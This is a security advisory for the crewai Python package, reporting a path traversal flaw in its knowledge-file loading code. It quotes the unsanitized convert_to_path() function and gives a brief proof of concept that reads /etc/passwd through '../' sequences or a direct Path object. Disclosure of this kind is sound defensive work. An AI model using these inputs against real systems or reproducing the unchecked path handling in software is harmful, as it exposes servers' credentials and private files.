Community Advisory: Path Traversal in Knowledge File Loading via Unsanitized Source Paths in crewai #7250
Description
Advisory Details
- Package ecosystem: pip
- Package name: crewai
- Affected versions: <= 0.108.0
- Patched versions: (none)
- Severity: Medium
- CWE: CWE-22 (Path Traversal)
Summary
convert_to_path() in crewai/knowledge/source/base_file_knowledge_source.py:88 does string concatenation without sanitizing ../ sequences. Passing Path objects bypasses the knowledge directory prefix entirely, allowing reading arbitrary files from the filesystem.
Details
The BaseFileKnowledgeSource class processes file paths provided in the source parameter. The convert_to_path() method at line 88 performs simple string concatenation to build the full file path:
def convert_to_path(self, source: Union[str, Path]) -> Path:
# When source is a Path object, it bypasses the knowledge_dir prefix
if isinstance(source, Path):
return source # No sanitization - returns attacker-controlled path as-is
# String paths get concatenated without ../ sanitization
return Path(self.knowledge_dir) / source # ../../../etc/passwd worksWhen a string source contains ../ sequences, they are not sanitized, allowing traversal outside the intended knowledge directory. When a Path object is passed directly, the knowledge directory prefix is bypassed entirely.
PoC
from crewai.knowledge.source.text_file_knowledge_source import TextFileKnowledgeSource
from pathlib import Path
# Method 1: String path traversal
source = TextFileKnowledgeSource(
file_paths=["../../../etc/passwd"]
)
# Reads /etc/passwd by traversing out of knowledge directory
# Method 2: Path object bypass
source = TextFileKnowledgeSource(
file_paths=[Path("/etc/passwd")]
)
# Directly reads /etc/passwd, bypassing knowledge_dir entirelyImpact
Any application that allows user-controlled input to CrewAI knowledge source paths can be exploited to read arbitrary files from the server filesystem. This can expose sensitive configuration files, credentials, and other private data.